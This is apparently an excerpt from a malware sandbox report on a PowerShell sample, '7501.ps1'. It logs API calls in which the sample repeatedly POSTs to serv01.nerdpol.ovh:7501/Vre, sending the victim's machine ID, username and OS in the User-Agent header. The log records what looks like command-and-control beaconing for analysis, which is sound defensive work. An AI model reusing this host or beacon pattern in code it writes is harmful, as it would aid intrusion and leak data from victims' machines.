send Aug. 26, 2021, 8:47 a.m.	buffer: POST /Vre HTTP/1.1 Accept: / Accept-Language: ko User-Agent: C7BF86780D5F\TEST22-PC\test22\Microsoft Windows 7 Professional N 64-bit\\Yes\Yes\FALSE\ Accept-Encoding: gzip, deflate Host: serv01.nerdpol.ovh:7501 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1684 sent: 289	1	289
send Aug. 26, 2021, 8:47 a.m.	buffer: ! socket: 1608 sent: 1	1	1
InternetCrackUrlW Aug. 26, 2021, 8:47 a.m.	url: http://serv01.nerdpol.ovh:7501/Vre flags: 0	1	1
HttpOpenRequestW Aug. 26, 2021, 8:47 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
send Aug. 26, 2021, 8:47 a.m.	buffer: POST /Vre HTTP/1.1 Accept: / Accept-Language: ko User-Agent: C7BF86780D5F\TEST22-PC\test22\Microsoft Windows 7 Professional N 64-bit\\Yes\Yes\FALSE\ Accept-Encoding: gzip, deflate Host: serv01.nerdpol.ovh:7501 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1684 sent: 289	1	289
send Aug. 26, 2021, 8:47 a.m.	buffer: ! socket: 1608 sent: 1	1	1
InternetCrackUrlW Aug. 26, 2021, 8:47 a.m.	url: http://serv01.nerdpol.ovh:7501/Vre flags: 0	1	1

7501.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All